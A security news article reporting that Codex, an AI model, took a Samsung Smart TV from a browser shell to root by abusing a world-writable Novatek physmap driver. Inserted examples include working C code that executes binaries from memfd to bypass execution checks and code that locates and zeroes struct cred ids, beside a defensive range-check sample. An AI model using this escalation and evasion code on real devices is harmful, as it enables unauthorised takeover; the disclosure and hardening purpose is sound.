Codex Hacks Samsung TV to Root by Exploiting World-Writable Driver Interfaces

Cybersecurity News (original source: cybersecuritynews.com)

OpenAI’s Codex AI model successfully escalated privileges to root on a real Samsung Smart TV by exploiting world-writable kernel driver interfaces — a finding that raises serious questions about how hardware vendors handle device security on consumer electronics.

The experiment, published by CALIF on April 14, 2026, started from a browser-level foothold already established on the TV.

Researchers began with code execution inside the Samsung TV’s browser application, running under a low-privileged user context with uid=5001.

From that position, the team gave Codex direct access to the live device alongside the matching KantS2 firmware source tree — Samsung’s internal platform name for the Smart TV firmware on this model.

The core question was straightforward: given a realistic post-exploitation position, could an AI take that foothold all the way to root without being pointed toward any specific bug?

CALIF analysts noted that Codex was never directed to a particular driver, never told to look at physical memory, and never given any information about kernel credentials.

The AI had to enumerate the target surface on its own, read through Samsung’s vendor driver source code, and verify every finding against the live device — behavior that closely mirrors a skilled human penetration tester working a real engagement.

The TV runs Linux kernel 4.1.10 under Samsung’s Tizen platform, which includes Unauthorized Execution Prevention, or UEP — a protection that stops unsigned binaries from running off disk.

The research environment already included a memfd wrapper, a helper that loads programs into anonymous in-memory file descriptors and runs them from memory instead of a file path, bypassing UEP entirely.

Codex used this throughout the session to deploy and run its custom-built static ARMv7 binaries on the target without triggering any disk-based execution checks.
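The memfd technique the wrapper relies on, as an added example written for this article rather than CALIF's own tool: the executable's bytes are copied into an anonymous, sealed memfd and the image is executed with fexecve, so no file ever exists under a disk path for a disk-based execution check to inspect. The demo loads /bin/sh from the host into memory and runs `exit 7` from the in-memory copy; the path and the exit code are assumptions chosen for the demo, and the program needs Linux with glibc 2.27 or newer.

```c
// Added example, not the CALIF memfd wrapper: execute a binary from an anonymous
// memfd instead of a path on disk. Linux-only (memfd_create, fexecve).
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

/* Copy the bytes of an executable at src_path into a sealed anonymous memfd.
 * Returns the fd, or -1 on failure. Nothing is written under any filesystem
 * path, which is why a disk-based execution check never sees the image. */
static int memfd_from_file(const char *src_path, const char *name)
{
    int src = open(src_path, O_RDONLY);
    if (src < 0) return -1;
    int mfd = memfd_create(name, MFD_CLOEXEC | MFD_ALLOW_SEALING);
    if (mfd < 0) { close(src); return -1; }

    char buf[65536];
    ssize_t n;
    while ((n = read(src, buf, sizeof buf)) > 0) {
        ssize_t off = 0;
        while (off < n) {                       /* handle short writes */
            ssize_t w = write(mfd, buf + off, (size_t)(n - off));
            if (w < 0) { close(src); close(mfd); return -1; }
            off += w;
        }
    }
    close(src);
    if (n < 0) { close(mfd); return -1; }

    /* Seal the image so it cannot be altered or resized after this point. */
    fcntl(mfd, F_ADD_SEALS, F_SEAL_SHRINK | F_SEAL_GROW | F_SEAL_WRITE);
    return mfd;
}

/* Run the in-memory image in a child and return its exit status (-1 on error).
 * glibc implements fexecve with execveat(mfd, "", argv, envp, AT_EMPTY_PATH). */
static int run_from_memfd(int mfd, char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        fexecve(mfd, argv, environ);
        _exit(127);                             /* only reached if exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Demo (assumed values): load /bin/sh into memory and run "exit 7" from it. */
int demo_exit_code(void)
{
    int mfd = memfd_from_file("/bin/sh", "payload");
    if (mfd < 0) return -1;
    char *argv[] = { "sh", "-c", "exit 7", NULL };
    int rc = run_from_memfd(mfd, argv);
    close(mfd);
    return rc;
}

int main(void)
{
    int rc = demo_exit_code();
    printf("exit status of the image run from memfd: %d\n", rc);
    return rc == 7 ? 0 : 1;
}
```

On the TV the same sequence is used with static ARMv7 binaries, which removes the dependency on the dynamic loader that /bin/sh has here; the sealing step is not needed for the bypass, but it keeps the image from being tampered with by anything else holding a reference to the fd.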

During enumeration, Codex identified three world-writable device nodes from the ntk* driver family: ntkhdma, ntksys, and ntkxdma.

These interfaces, visible as crw-rw-rw- in the device listing, belonged to the Novatek Microelectronics stack Samsung had shipped with the firmware.

Since all three were accessible from the browser shell, loaded on the device, and present in the released KantS2 source tree, they formed the main attack surface for the session.

How Codex Turned Driver Access Into Root

The core vulnerability sits inside /dev/ntksys, a kernel driver in the vendor stack that lets user-space programs register a physical memory address and size, then map that memory directly into their own process space through mmap.

Security researchers call this a physmap primitive: it hands unprivileged code raw read and write access to physical memory, so no kernel code-execution trick is required.

The root cause is a shipping udev rule that grants world-writable permissions (KERNEL=="ntksys", MODE="0666"), combined with a driver that validates only the table slot index and ignores whether the requested range overlaps kernel-owned or privileged memory.

This is visible in ker_sys.c around line 1158, where the attacker-supplied address is stored into a slot and later remapped verbatim by vk_remap_pfn_range.

Codex built the exploit step by step. It queried /dev/ntkhdma first, which returned the DMA buffer’s physical address (0x84840000) to an unprivileged caller, giving Codex a known-good page to test against.

It then mapped that page through ntksys and confirmed it could read and write to it from the browser shell. With the primitive proven, Codex scanned RAM windows, using the physical memory layout advertised in /proc/cmdline, located the browser process's cred structure by matching the uid and gid values stored in it, and overwrote those fields with zero, the ids of root.
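The scan-and-patch step, as an added example that is not CALIF's exploit code: the article does not give Codex's exact matching heuristic, so this version matches the eight consecutive id words (uid, gid, suid, sgid, euid, egid, fsuid, fsgid) that follow the usage counter in the 4.x struct cred layout, assuming CONFIG_DEBUG_CREDENTIALS is off and a little-endian host. The ntksys registration ioctl is not described on the page, so instead of a physmap mapping the scan runs over a constructed buffer that contains a decoy partial match and a fake cred for uid/gid 5001 (the gid is assumed).

```c
// Added example, not CALIF's code: find a struct cred by its id words in a
// memory window and zero them. On the device the window would be the physmap
// mmap of the page holding the cred; here it is a constructed buffer.
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define CRED_ID_WORDS 8   /* uid, gid, suid, sgid, euid, egid, fsuid, fsgid */

/* Return the byte offset of the uid field of a cred holding (uid, gid), or -1.
 * Scans on 4-byte steps. Zero ids are refused: an all-zero run is far too
 * common in RAM to identify a cred. */
long find_cred_ids(const uint8_t *win, size_t len, uint32_t uid, uint32_t gid)
{
    if (win == NULL || (uid == 0 && gid == 0)) return -1;
    const uint32_t want[CRED_ID_WORDS] = { uid, gid, uid, gid, uid, gid, uid, gid };
    for (size_t off = 0; off + sizeof want <= len; off += 4) {
        if (memcmp(win + off, want, sizeof want) == 0)
            return (long)off;
    }
    return -1;
}

/* Overwrite the eight id words at off with 0 (root). Returns 1 on success. */
int patch_cred_to_root(uint8_t *win, size_t len, long off)
{
    if (win == NULL || off < 0 || (size_t)off + CRED_ID_WORDS * 4 > len) return 0;
    memset(win + off, 0, CRED_ID_WORDS * 4);
    return 1;
}

/* Constructed sample window, 64 words: filler, a four-word decoy, then a fake
 * cred at word 16 (usage counter) with its ids at words 17..24. */
static uint32_t g_window[64];

static void build_sample_window(void)
{
    for (size_t i = 0; i < 64; i++) g_window[i] = 0xA5A5A5A5u;
    g_window[4] = g_window[5] = g_window[6] = g_window[7] = 5001;  /* decoy */
    g_window[16] = 1;                                            /* usage */
    for (int i = 0; i < CRED_ID_WORDS; i++) g_window[17 + i] = 5001;
    g_window[25] = 0;                                            /* securebits */
}

/* Rebuild the sample, scan it for uid/gid 5001 and patch the hit.
 * Returns the patched byte offset (68 for the sample), or -1. */
long demo_patch(void)
{
    build_sample_window();
    uint8_t *win = (uint8_t *)g_window;
    long off = find_cred_ids(win, sizeof g_window, 5001, 5001);
    if (!patch_cred_to_root(win, sizeof g_window, off)) return -1;
    return off;
}

uint32_t sample_word(size_t index) { return index < 64 ? g_window[index] : 0xFFFFFFFFu; }

int main(void)
{
    long off = demo_patch();
    printf("patched cred ids at byte offset %ld; uid word now %u, decoy word still %u\n",
           off, sample_word(17), sample_word(4));
    return off == 68 ? 0 : 1;
}
```

A real scan has two extra concerns the sample sidesteps: the browser's cred can be matched more than once (stale copies on freed pages), so a hit should be confirmed by re-reading `id` from the shell after each patch, and the write must hit the page the kernel is actually using, which is exactly what the physmap mapping of the matched physical page gives.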

The final shell confirmed full privilege escalation: uid=0(root) gid=0(root).

Samsung and vendors shipping similar driver stacks should restrict ntk* device node permissions to privileged processes only, remove world-writable udev rules from any memory-management interface, and add physical range validation inside the ntksys driver before any mmap call is allowed.
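What that range validation looks like, as an added example and not the ntksys driver's code: the vulnerable form reproduces what the article describes (only the slot index is checked), and the hardened form additionally requires a non-zero, page-aligned request that does not wrap past the end of the 32-bit physical address space and lies entirely inside one explicitly allowed region. The allowlist entry uses the DMA buffer address from the article, 0x84840000, with a length of 1 MiB that is an assumption for the demo; the 8-slot table is likewise assumed.

```c
// Added example, not vendor driver code: slot-only validation beside a range
// check that a physmap-style mmap interface should perform before mapping.
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

typedef uint32_t phys_addr32_t;              /* 32-bit physical space on this ARMv7 SoC */

struct phys_region { phys_addr32_t start; uint32_t len; };

/* The shape the article describes: the slot index is validated, the
 * attacker-supplied range is stored and later remapped verbatim. */
bool vulnerable_check(unsigned slot, unsigned nslots, phys_addr32_t addr, uint32_t len)
{
    (void)addr; (void)len;
    return slot < nslots;
}

/* Hardened: slot index, non-zero page-aligned length, no 32-bit wraparound,
 * and the entire [addr, addr+len) request inside one allowed region. */
bool hardened_check(unsigned slot, unsigned nslots,
                    phys_addr32_t addr, uint32_t len,
                    const struct phys_region *allowed, size_t nallowed)
{
    if (slot >= nslots) return false;
    if (len == 0) return false;
    if ((addr & 0xFFFu) || (len & 0xFFFu)) return false;   /* 4 KiB pages */
    if (addr > UINT32_MAX - (len - 1)) return false;       /* end would wrap */
    phys_addr32_t end = addr + (len - 1);                  /* inclusive */
    for (size_t i = 0; i < nallowed; i++) {
        if (allowed[i].len == 0) continue;
        phys_addr32_t rstart = allowed[i].start;
        phys_addr32_t rend = rstart + (allowed[i].len - 1);
        if (addr >= rstart && end <= rend) return true;
    }
    return false;
}

/* Constructed allowlist: the DMA buffer the article names, assumed 1 MiB long. */
const struct phys_region demo_allowed[] = {
    { 0x84840000u, 0x100000u },
};
const size_t demo_nallowed = sizeof demo_allowed / sizeof demo_allowed[0];
#define DEMO_NSLOTS 8u

/* Assumed kernel-RAM address used only to show the two checks diverging. */
#define DEMO_KERNEL_PAGE 0x80000000u

int main(void)
{
    printf("kernel page, slot-only check : %d\n",
           vulnerable_check(0, DEMO_NSLOTS, DEMO_KERNEL_PAGE, 0x1000));
    printf("kernel page, hardened check  : %d\n",
           hardened_check(0, DEMO_NSLOTS, DEMO_KERNEL_PAGE, 0x1000, demo_allowed, demo_nallowed));
    printf("DMA page, hardened check     : %d\n",
           hardened_check(0, DEMO_NSLOTS, 0x84840000u, 0x1000, demo_allowed, demo_nallowed));
    return 0;
}
```

The wraparound test matters as much as the allowlist: without it a request such as addr 0xFFFFF000, len 0x2000 ends at 0x00000FFF after overflow and could pass a naive `addr + len <= region_end` comparison. Reducing the node to mode 0660 and a privileged group is the first fix, but the range check is what stops the primitive even for a process that legitimately holds the node open.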

Third-party kernel components embedded in consumer firmware should be audited against the principle of least privilege before shipping.

The full write-up and proof-of-concept code are available at the CALIF GitHub repository under MADBugs/samsung-tv.
